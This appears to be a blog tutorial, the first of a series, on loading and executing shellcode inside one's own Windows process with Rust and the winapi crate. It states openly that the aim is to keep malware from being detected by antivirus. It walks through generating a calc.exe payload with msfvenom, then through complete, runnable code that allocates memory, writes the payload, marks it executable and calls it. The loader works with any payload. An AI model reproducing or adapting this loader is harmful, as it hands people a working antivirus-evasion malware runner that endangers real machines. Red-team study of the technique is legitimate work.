Payload Injection on Windows Part I

05 Oct 2021

Hello! This is going to be a short series on malicious payload self-injection in Windows. The goal is to start easy by using normal userland Windows APIs, then move on to undocumented API calls from NTDLL, and finally use SysWhispers to make system calls directly from our binary.

Why would you want to inject a malicious payload into your own process?

Usually this is done to prevent AV from detecting your malware on disk. You can embed an encrypted payload within the process to get around signature detections, or pull the malicious payload from the internet directly into memory so that the shellcode is never on disk at all.

This post will go over using the normal userland Windows APIs to allocate memory in our own process, write a payload to the memory, and then execute the payload. Before we get coding, let's quickly talk about the Windows API.

The Windows API is a series of interfaces for developing applications for Windows devices. The API exposes functionality for interacting with almost all parts of the operating system including process and memory manipulation, file and registry operations, access token creation and more. Microsoft also has excellent documentation including some examples! We will be using the Windows API documentation throughout these and other blog series. You can check out the API documentation here.

With that out of the way, let's get started!

First we will create our malicious shellcode: in this case, just a simple payload that executes calc.exe.

kali@kali:~$ msfvenom -a x64 --platform windows -p windows/x64/exec CMD="calc.exe" -f raw > pop-calc.bin
No encoder specified, outputting raw payload
Payload size: 276 bytes

Now for the real code.

We'll be using Rust and the Winapi-rs crate to interact with the Windows API so we'll create a project called winapi-userland and add winapi to our Cargo.toml. According to the winapi documentation, the crate is broken up into modules which include the different functionality of the Windows API. We'll have to add minwindef and winnt for type definitions, and the memoryapi for memory functions to our Cargo.toml to use the required functions.

cargo new --bin winapi-userland

# Contents of Cargo.toml

[package]
name = "winapi-userland"
version = "0.1.0"
edition = "2018"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
winapi = { version = "0.3.9", features = ["minwindef", "winnt", "memoryapi"]}

The basic code execution path using userland APIs is the following: VirtualAlloc to allocate memory, WriteProcessMemory to write the payload to the memory location, then a cast of the memory location to a function pointer, and finally a call to that function. We'll also use VirtualProtect to change the memory protections so we can avoid Read-Write-Execute memory pages, and we'll use VirtualFree to free the memory afterward.

First, we'll include our payload in main. I love using the include_bytes macro for stuff like this; it's super convenient. Next, we'll have to allocate some memory within our own process. We'll do this using the VirtualAlloc function. You can see the MSDN documentation for VirtualAlloc here, but we'll be using the Winapi-rs definition below.

pub unsafe extern "system" fn VirtualAlloc(
    lpAddress: LPVOID,
    dwSize: SIZE_T,
    flAllocationType: DWORD,
    flProtect: DWORD
) -> LPVOID

I've annotated the call below with information about the arguments.

pub unsafe extern "system" fn VirtualAlloc(  
    lpAddress: LPVOID,   // Per MSDN we can pass a NULL pointer here
    dwSize: SIZE_T,   // size of the memory we are requesting 
    flAllocationType: DWORD,   // reserve or reserve and commit memory pages 
    flProtect: DWORD  // Memory region protections (read-write, read, execute, etc.)
) -> LPVOID
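The flAllocationType argument is a set of bit flags, which is why the calls in this post combine MEM_RESERVE and MEM_COMMIT with a bitwise OR. Here is a minimal sketch of that idea. It assumes local copies of the constants (redefined here so the sketch runs without the winapi crate) and two hypothetical helpers, reserve_and_commit and has_flag:

```rust
// Local copies of two Windows constants, redefined here for illustration
// so the sketch does not depend on the winapi crate.
const MEM_COMMIT: u32 = 0x0000_1000;
const MEM_RESERVE: u32 = 0x0000_2000;

/// Hypothetical helper: combine the reserve and commit flags with a bitwise OR.
fn reserve_and_commit() -> u32 {
    MEM_RESERVE | MEM_COMMIT
}

/// Hypothetical helper: true if every bit of `flag` is set in `value`.
fn has_flag(value: u32, flag: u32) -> bool {
    value & flag == flag
}

fn main() {
    let allocation_type = reserve_and_commit();
    println!("allocation type: {:#x}", allocation_type);
    println!("commit requested: {}", has_flag(allocation_type, MEM_COMMIT));
    println!("reserve requested: {}", has_flag(allocation_type, MEM_RESERVE));
}
```

In the real program these constants come from winapi::um::winnt, so there is no need to redefine them.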

We'll include VirtualAlloc and some definitions from winapi, along with std::ptr for pointers, and try to call VirtualAlloc.

use std::ptr;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE};


fn main() {

	let payload = include_bytes!("pop-calc.bin");
	let memory = VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);

	println!("Allocated memory at {:x?}!", memory);

}

and we run....

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
error[E0133]: call to unsafe function is unsafe and requires unsafe function or block
 --> src\main.rs:7:18
  |
7 |     let memory = VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
  |                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ call to unsafe function
  |
  = note: consult the function's documentation for information on how to avoid undefined behavior

For more information about this error, try `rustc --explain E0133`.
error: could not compile `winapi-userland` due to previous error

Ah yes, it looks like calling the Windows API using winapi-rs is unsafe. We'll have to wrap these function calls in unsafe blocks to get it to work.

use std::ptr;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE};


fn main() {

	let payload = include_bytes!("pop-calc.bin");
	let memory = unsafe { VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)};

	println!("Allocated memory at {:x?}!", memory);

}

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
    Finished dev [unoptimized + debuginfo] target(s) in 0.64s
     Running `target\debug\winapi-userland.exe`
Allocated memory at 0x25875330000!
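The program above only prints the returned address. VirtualAlloc returns a null pointer on failure, so a check before using the memory is probably worth having. Here is a minimal sketch of one, assuming a hypothetical helper named check_allocation and using std::ffi::c_void as a stand-in for the winapi c_void type so that it compiles on any platform:

```rust
use std::ffi::c_void;
use std::ptr::{self, NonNull};

/// Hypothetical helper: turn a raw allocation result into a Result,
/// treating a null pointer as failure.
fn check_allocation(memory: *mut c_void) -> Result<NonNull<c_void>, &'static str> {
    NonNull::new(memory).ok_or("allocation returned a null pointer")
}

fn main() {
    // Stand-in for a failed allocation.
    let failed: *mut c_void = ptr::null_mut();
    println!("null pointer rejected: {}", check_allocation(failed).is_err());

    // Stand-in for a successful allocation: any non-null address will do here.
    let mut backing = [0u8; 16];
    let allocated = backing.as_mut_ptr() as *mut c_void;
    println!("non-null pointer accepted: {}", check_allocation(allocated).is_ok());
}
```

To keep the listings short, the rest of this post skips this check.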

Great! Looks like we're able to allocate some memory using VirtualAlloc. Now we can copy the bytes from our payload to the new memory location. Let's take a look at WriteProcessMemory.

pub unsafe extern "system" fn WriteProcessMemory(  
    hProcess: HANDLE,   // handle to the process containing the memory we're writing to. 
    lpBaseAddress: LPVOID,   // base address of writeable memory location
    lpBuffer: LPCVOID,   // pointer to the buffer that we want to write from
    nSize: SIZE_T,   // length of the data that we're writing.
    lpNumberOfBytesWritten: *mut SIZE_T  // variable that will receive the number of bytes written during this call
) -> BOOL

To make it easy to get a handle to the current process, we'll add the processthreadsapi to the winapi crate in our Cargo.toml so that we can call the Windows GetCurrentProcess function.
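With that feature added, the dependency line in Cargo.toml would look something like this (a sketch that only extends the feature list shown earlier):

```toml
[dependencies]
winapi = { version = "0.3.9", features = ["minwindef", "winnt", "memoryapi", "processthreadsapi"] }
```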

The WriteProcessMemory function reports the number of bytes written through a mutable pointer to a variable (an out-parameter). This is pretty common for Windows functions, so we'll create a mutable variable called bytes_written and pass a pointer to it to get our output.

For the process handle and the memory address, we'll use the values returned by the GetCurrentProcess and VirtualAlloc calls. We can use the as_ptr() method on our byte array to get a pointer to the array and then cast it as *mut c_void. The len() method on our byte array gives us the length of the array, and finally we can pass in a mut pointer to our bytes_written variable.

Instead of checking the result of the function, we'll just print bytes_written to see if we wrote any bytes.

use std::ptr;
use winapi::ctypes::c_void;
use winapi::um::memoryapi::{VirtualAlloc, WriteProcessMemory};
use winapi::um::processthreadsapi::GetCurrentProcess;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE};


fn main() {

	let payload = include_bytes!("pop-calc.bin");
	
	let memory = unsafe { VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)};
	
	println!("Allocated memory at {:x?}!", memory);
	
	let handle = unsafe { GetCurrentProcess() };
	let mut bytes_written = 0;

	let _result = unsafe { WriteProcessMemory(handle, memory, payload.as_ptr() as *mut c_void, payload.len(), &mut bytes_written)};
	
	println!("{} bytes written!", bytes_written);

}

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
    Finished dev [unoptimized + debuginfo] target(s) in 0.73s
     Running `target\debug\winapi-userland.exe`
Allocated memory at 0x1e692ee0000!
276 bytes written!
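The out-parameter pattern used by WriteProcessMemory can be tried out without touching the Windows API. In this minimal sketch, write_memory is a hypothetical stand-in written for illustration (it is not a winapi function). Like the real call, it returns nonzero on success and reports the byte count through a pointer, and here the return value is checked as well:

```rust
use std::ffi::c_void;
use std::ptr;

/// Hypothetical stand-in for a C-style API: copies `len` bytes from `src`
/// to `dst`, reports the count through `written`, returns nonzero on success.
///
/// # Safety
/// `dst` and `src` must be valid for `len` bytes and must not overlap;
/// `written` must be null or point to a writable usize.
unsafe fn write_memory(
    dst: *mut c_void,
    src: *const c_void,
    len: usize,
    written: *mut usize,
) -> i32 {
    if dst.is_null() || src.is_null() {
        return 0;
    }
    unsafe {
        ptr::copy_nonoverlapping(src as *const u8, dst as *mut u8, len);
        if !written.is_null() {
            *written = len;
        }
    }
    1
}

/// Copy `payload` into `buffer` and return the byte count reported
/// through the out-parameter, or None if the copy could not be made.
fn copy_with_out_param(payload: &[u8], buffer: &mut [u8]) -> Option<usize> {
    if buffer.len() < payload.len() {
        return None;
    }
    let mut bytes_written: usize = 0;
    // `&mut bytes_written` coerces to `*mut usize`, the out-parameter.
    let ok = unsafe {
        write_memory(
            buffer.as_mut_ptr() as *mut c_void,
            payload.as_ptr() as *const c_void,
            payload.len(),
            &mut bytes_written,
        )
    };
    if ok != 0 { Some(bytes_written) } else { None }
}

fn main() {
    let payload = [0xAAu8, 0xBB, 0xCC, 0xDD];
    let mut buffer = [0u8; 8];
    match copy_with_out_param(&payload, &mut buffer) {
        Some(n) => println!("{} bytes written!", n),
        None => println!("write failed"),
    }
}
```

The same shape applies to the real call: check that the returned BOOL is nonzero, then read bytes_written.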

Ok, so far so good. Before we can execute our shellcode, we'll have to change the permissions on the memory that we allocated. We can do this using the VirtualProtect function.

pub unsafe extern "system" fn VirtualProtect(  
    lpAddress: LPVOID,   // address of beginning of the memory location
    dwSize: SIZE_T,  // size of memory location
    flNewProtect: DWORD,  // new protections (read-only, read-write, read-execute, etc) 
    lpflOldProtect: PDWORD  // pointer to a variable to receive the old protections
) -> BOOL

VirtualProtect also passes data out through a mut pointer to a variable so we'll create a variable called old_protect to get that data out. The rest of the arguments are pretty similar to those that we've used previously. We'll get the address from the memory variable, the size from the length of the payload, and we'll just pass in the new protection using definitions from winapi.

... unchanged ...
use winapi::um::memoryapi::{VirtualProtect, VirtualAlloc, WriteProcessMemory};
use winapi::um::processthreadsapi::GetCurrentProcess;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, PAGE_READWRITE, PAGE_EXECUTE_READ};

fn main() {
... unchanged ...
    let mut old_protect = 0;
    let result = unsafe { VirtualProtect(memory, payload.len(), PAGE_EXECUTE_READ, &mut old_protect)};
    if result > 0 {
        println!("Sucessfully updated memory protections!");
    }
}

D:\projects\rust\blog\win-api\winapi-userland>cargo run
   Compiling winapi-userland v0.1.0 (D:\projects\rust\blog\win-api\winapi-userland)
    Finished dev [unoptimized + debuginfo] target(s) in 0.67s
     Running `target\debug\winapi-userland.exe`
Allocated memory at 0x271340e0000!
276 bytes written!
Sucessfully updated memory protections!

Great! We're almost there! Now we have to cast the pointer to our memory location, where the payload is written, to a function pointer, and then call the function.

We can cast the pointer to our memory location to a function pointer using std::mem::transmute. Since shellcode is likely using the C calling convention, we will use extern "C" to ensure the proper calling convention and we will ignore any returned values.
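To see the cast on its own, here is a minimal sketch that round-trips an ordinary function through an untyped pointer and calls it again. The names add_one and call_through_raw_pointer are made up for this illustration, and std::ffi::c_void stands in for the winapi c_void type. Note that transmute only reinterprets the bits. Nothing checks that the address holds valid code with the stated signature, so that guarantee is entirely on the caller.

```rust
use std::ffi::c_void;
use std::mem;

/// An ordinary function standing in for the code at the target address.
extern "C" fn add_one(x: i32) -> i32 {
    x + 1
}

/// Hypothetical helper: erase the function's type, then recover it with
/// transmute and call it.
fn call_through_raw_pointer(x: i32) -> i32 {
    // Start from a typed function pointer.
    let typed: extern "C" fn(i32) -> i32 = add_one;
    // Erase the type, leaving only an address (like the `memory` pointer).
    let raw = typed as *mut c_void;
    // Reinterpret the address as a function pointer. This is only sound
    // because `raw` really does point at a function with this signature.
    let function =
        unsafe { mem::transmute::<*mut c_void, extern "C" fn(i32) -> i32>(raw) };
    function(x)
}

fn main() {
    println!("{}", call_through_raw_pointer(41));
}
```

In the program, the same cast is applied to the memory pointer, with a function type that takes no arguments and returns nothing.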

... unchanged ...
fn main() {
... unchanged ...
    if result > 0 {
        println!("Sucessfully updated memory protections!");

        let function = unsafe {
            std::mem::transmute::<*mut c_void, unsafe extern "C" fn()>(memory)
        };
        unsafe { function(); }
    }
}

Let's run it!

Success! We have used the Windows API to allocate memory in our own process, write our payload to that memory, change the memory protections, and then execute the payload. Now a quick call to VirtualFree to free up the memory that we allocated.

Let's take a look at our current source code.

use std::ptr;
use winapi::ctypes::c_void;
use winapi::um::memoryapi::{VirtualProtect, VirtualAlloc, VirtualFree, WriteProcessMemory};
use winapi::um::processthreadsapi::GetCurrentProcess;
use winapi::um::winnt::{MEM_RESERVE, MEM_COMMIT, MEM_RELEASE, PAGE_READWRITE, PAGE_EXECUTE_READ};

fn main() {
    let payload = include_bytes!("pop-calc.bin");

    // Allocate read-write memory large enough for the payload.
    let memory = unsafe { VirtualAlloc(ptr::null_mut(), payload.len(), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE) };
    println!("Allocated memory at {:x?}!", memory);

    let handle = unsafe { GetCurrentProcess() };

    let mut bytes_written = 0;

    // Copy the payload into the allocated region.
    let _result = unsafe { WriteProcessMemory(handle, memory, payload.as_ptr() as *mut c_void, payload.len(), &mut bytes_written) };

    println!("{} bytes written!", bytes_written);

    let mut old_protect = 0;

    // Switch the region from read-write to read-execute.
    let result = unsafe { VirtualProtect(memory, payload.len(), PAGE_EXECUTE_READ, &mut old_protect) };

    if result > 0 {
        println!("Sucessfully updated memory protections!");
        let function = unsafe {
            std::mem::transmute::<*mut c_void, unsafe extern "C" fn()>(memory)
        };
        unsafe { function(); }
        // With MEM_RELEASE, dwSize must be 0; the whole region is released.
        let _r = unsafe { VirtualFree(memory, 0, MEM_RELEASE) };
    }
}

Note that we have a line in the program to call VirtualFree; however, the default shellcode generated by msfvenom includes a call to exit the process, so we will never reach that code. Additionally, this code may crash after calling the shellcode if the shellcode does not adhere to the standard C calling convention and properly return to the caller (it usually doesn't).

Wow, that code contains a lot of unsafe. Check out part II, where we create a wrapper for the Windows API functions to make a safer interface.